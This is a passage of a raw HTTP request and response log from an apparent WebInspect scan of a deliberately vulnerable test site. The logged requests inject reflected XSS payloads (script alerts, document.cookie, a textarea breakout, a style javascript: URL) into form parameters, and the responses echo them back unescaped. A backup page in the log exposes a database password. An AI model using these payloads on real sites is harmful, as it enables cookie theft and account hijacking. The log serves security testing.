GET /join.asp?name=&email=>"><script>alert("XSS")</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:31 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm 
Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 11 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect cboPage=pc1
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:18 GMT X-Powered-By: ASP.NET Location: p1.asp Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /linking/link1/link2/link3/link4/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:28 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=>"><script>alert('XSS')</script>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:28 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD 
bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 11 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect cboPage=pc2
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:18 GMT X-Powered-By: ASP.NET Location: p2.asp Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /login/login.asp?Action=Login&UserName=</textarea><script>alert('XSS')</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0 Referer: http://zero.webappsecurity.com:80/login/login.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:53:59 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 363 Content-Type: text/html Cache-control: private <HTML> <HEAD> <BODY> <h1>Invalid username: </textarea><script>alert('XSS')</script></h1> <form action=login.asp method=get> Please login:<br> Username: <input type=text name=UserName><br> Password: <input type=password name=Password><br> <input type=submit value="Login"><br> <input type=hidden name=Action value="Login"><br> </form> </BODY></HTML>
GET /join.asp?name=&email=&surname=&house=test@<script>alert(document.cookie)</script>.com&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:54:37 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4022 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD 
bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /admin/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:33 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /include/common.inc HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:42:02 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:00 GMT ETag: "be7c48f8a9dc11:8f6" Content-Length: 15 my include file
GET /_vti_log/document.URL; HTTP/1.0 Referer: http://zero.webappsecurity.com:80/_vti_log/ Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:44 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. 
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> 
</li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>
GET /pindex.asp.bak HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:34:52 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:38:17 GMT ETag: "208026c0a8dc11:8f6" Content-Length: 2061 <html> <body> <!-- Hidden Reference comment: should find this file /test/hidden.txt --> This page allows for testing of pareters.<br> <br> The first section shows how a combo box can be used to product optional pages<br> <form action = pcomboindex.asp method=post> <SELECT name=cboPage> <OPTION selected value=pc1>Show Page One</OPTION> <option value=pc2>Show Page Two</option> <option value=pc3>Show page three</option> </select><br> <input type=submit value=Submit> </form><br> <hr> <a href="plink.asp?a=b&c=12">Second section is link that passes parameters to a sub page</a><br> <br> <A href="error.html">My ERROR</A> Third example allows the user to input values and then shows them on the following page<br> <Form action="pformresults.asp" method=post> First Name: <input type=text name=txtFirstName><br> Last Name: <input type=text name=txtLastName><br> <input type=hidden name=txtHidden value="This was hidden from the user"> <input type=hidden name=dbConnectString value="dbCCNumbers;uid=sa;password=scoobydo"> <input type=submit value="Show User Input results"><br> </form><br> <hr> <form action="rootlogin.asp" method=post> User Name:<input type=text name=txtName><br> Pass phrase:<input type=text name=txtPassPhrase><br> <input type=submit value="Login"><br> </form> <br> False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <br> False Keyword that should not be flagged: An error has occurred <br> <br> <br> <A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by SmartChecker</A> <br> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit - Should not be flagged due to not having keyword present</A> <br> <A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by 
Smartchecker(Note: No HTML present)</A> <br> <A HREF="/linking/index.htm">Several chained directories</A> <br> <A HREF="/cfmerror.html">Cold Fusion Error</A> <br> <A HREF="/admin/help.cgi">Help</A> <br> <A HREF="/aspnet.aspx">ASP.NET file</A> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=1"style="background:url(javascript:alert('XSS'))"%20"&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:26 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4025 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD 
bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home 